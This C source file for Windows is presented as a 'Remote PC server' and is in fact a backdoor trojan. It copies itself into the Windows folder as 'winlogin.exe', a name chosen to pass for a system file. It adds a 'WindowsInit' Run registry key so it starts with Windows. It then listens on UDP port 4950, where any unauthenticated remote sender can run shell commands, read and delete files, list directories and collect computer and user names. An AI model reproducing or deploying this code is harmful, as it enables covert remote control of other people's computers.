/* Remote PC server source code
 *
 *                by : koby
 *                      koby@in.gr
 * If you like this code, enjoy this site
 *                      http://www.codecraft.tk
 *
 *    Copyright (c) 2003
 *                    koby and www.Codecraft.tk. All rigths reserved
 *    Redistributions of source code must retain the above copyright
 *    notice and the following disclaimer.
 *
 *     THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND
 *    ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
 *    IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
 *    ARE DISCLAIMED.
 *
 */

#include <stdio.h>
#include <winsock.h>
#include <windows.h>

#define MYPORT 4950    // the port users will be connecting to
#define MAXBUFLEN 100

void dir(int sockfd, struct sockaddr *their_addr);
void RegStartUp(void);
void replicate(char *filename);
void SystemInfo(int sockfd, struct sockaddr *their_addr);
void view(int sockfd, char *name, struct sockaddr *their_addr);

int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) {

	WSADATA wsaData;
	FILE *fp;
	int sockfd;
	struct sockaddr_in my_addr;     // my address information
	struct sockaddr_in their_addr;  // connector's address information
	int addr_len, numbytes;
	char buf[MAXBUFLEN], *str="***";
	char FileName[MAX_PATH];        // file's name

	if (WSAStartup(MAKEWORD(1,1), &wsaData) != 0) {
		fprintf(stderr, "WSAStartup failed!");
		exit(1);
	}

	hInstance = GetModuleHandle(NULL);
	GetModuleFileName(hInstance, FileName, MAX_PATH);
	replicate(FileName);						// copy to the windows folder ...
	RegStartUp();	// Create a registry key ...

	sockfd = socket(AF_INET, SOCK_DGRAM, 0);

	my_addr.sin_family = AF_INET;         // host byte order
	my_addr.sin_port = htons(MYPORT);     // short, network byte order
	my_addr.sin_addr.s_addr = INADDR_ANY; // automatically fill with my IP
	memset(&(my_addr.sin_zero), '\0', 8); // zero the rest of the struct

	bind(sockfd, (struct sockaddr *)&my_addr, sizeof(struct sockaddr));

	addr_len = sizeof(struct sockaddr);

	while(1) {
		numbytes=recvfrom(sockfd,buf, MAXBUFLEN-1, 0, (struct sockaddr *)&their_addr, &addr_len);

		buf[numbytes] = '\0';

		sendto(sockfd, buf, strlen(buf), 0, (struct sockaddr *)&their_addr, sizeof(struct sockaddr));

		if( buf[0]=='m' && buf[1]=='s' && buf[2]=='g' && buf[3]==' ' ) {
			MessageBox(NULL, &buf[4], "info", MB_OK);
		}
		else if( buf[0]=='s' && buf[1]=='y' && buf[2]=='s' && buf[3]==' ' ) {
			system(&buf[4]);
		}
		else if( buf[0]=='v' && buf[1]=='i' && buf[2]=='e' && buf[3]=='w' && buf[4]==' ' )
			view(sockfd, &buf[5], (struct sockaddr *)&their_addr);
		else if( buf[0]=='c' && buf[1]=='h' && buf[2]=='d' && buf[3]=='i' && buf[4]=='r' && buf[5]==' ' )
			SetCurrentDirectory(&buf[6]);
		else if( buf[0]=='r' && buf[1]=='m' && buf[2]==' ' )
			remove(&buf[3]);
		else if( !strcmp(buf, "dir") )
			dir(sockfd, (struct sockaddr *)&their_addr);
		else if( !strcmp(buf, "info") )
			SystemInfo(sockfd, (struct sockaddr *)&their_addr);

		sendto(sockfd, str, strlen(str), 0, (struct sockaddr *)&their_addr, sizeof(struct sockaddr));

	}/* while(1) */

	return 0;

}
void dir(int sockfd, struct sockaddr *their_addr) {

	FILE *fp;
	char buf[MAXBUFLEN];
	char *call="dir > 0:\\dir.txt"; // 0 will be replaced with the current drive
	char *path="0:\\dir.txt";

	path[0]=64+getdrive(); //getdrive() returns an integer. 1 for A, 2 for B, 3 for C, ...
	call[6]=64+getdrive();

	system(call);
	fp=fopen(path, "r");
	do {
		fgets(buf, MAXBUFLEN-1, fp);
		sendto(sockfd, buf, strlen(buf), 0, their_addr, sizeof(struct sockaddr));
	} while(!feof(fp));
	fclose(fp);
	remove(path);

}

void view(int sockfd, char *name, struct sockaddr *their_addr) {

	FILE *fp;
	char buf[MAXBUFLEN];

	if( (fp=fopen(name, "r"))==NULL )
		sendto(sockfd,"Cannot open file", 16, 0, their_addr, sizeof(struct sockaddr));
	do {
		fgets(buf, MAXBUFLEN-1, fp);
		sendto(sockfd, buf, strlen(buf), 0, their_addr, sizeof(struct sockaddr));
	}while(!feof(fp));

}

void RegStartUp(void) {

	HKEY hk;
	char buf[MAX_PATH];

	GetWindowsDirectory(buf, MAX_PATH+1);
	strcat(buf, "\\winlogin.exe");

	if( RegOpenKey(HKEY_LOCAL_MACHINE, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", &hk) )
		fprintf(stderr, "Could not open the registry key.");

	if( RegSetValueEx(hk, "WindowsInit", 0, REG_SZ, buf, strlen(buf)) )
		fprintf(stderr, "Could not set the event message file.");

	RegCloseKey(hk);

}

void replicate(char *filename) {

	int res;
	char buf[MAX_PATH];

	GetWindowsDirectory(buf, MAX_PATH+1);

	strcat(buf, "\\winlogin.exe");

	//if the new file already exists, the function
	//overwrites the existing file and succeeds.
	CopyFile(filename, buf, FALSE);

}

void SystemInfo(int sockfd, struct sockaddr *their_addr) {

	DWORD cchBuff = 256;
	char array[MAX_PATH];

	GetComputerName(array, &cchBuff);
	sendto(sockfd, "\nComputer name     : ", 21, 0, their_addr, sizeof(struct sockaddr));
	sendto(sockfd, array, strlen(array), 0, their_addr, sizeof(struct sockaddr));
	GetUserName(array, &cchBuff);
	sendto(sockfd, "\nUser's name       : ", 21, 0, their_addr, sizeof(struct sockaddr));
	sendto(sockfd, array, strlen(array), 0, their_addr, sizeof(struct sockaddr));
	GetWindowsDirectory(array, MAX_PATH+1);
	sendto(sockfd, "\nWindows directory : ", 21, 0, their_addr, sizeof(struct sockaddr));
	sendto(sockfd, array, strlen(array), 0, their_addr, sizeof(struct sockaddr));
	GetSystemDirectory(array, MAX_PATH+1);
	sendto(sockfd, "\nSystem directory  : ", 21, 0, their_addr, sizeof(struct sockaddr));
	sendto(sockfd, array, strlen(array), 0, their_addr, sizeof(struct sockaddr));

}
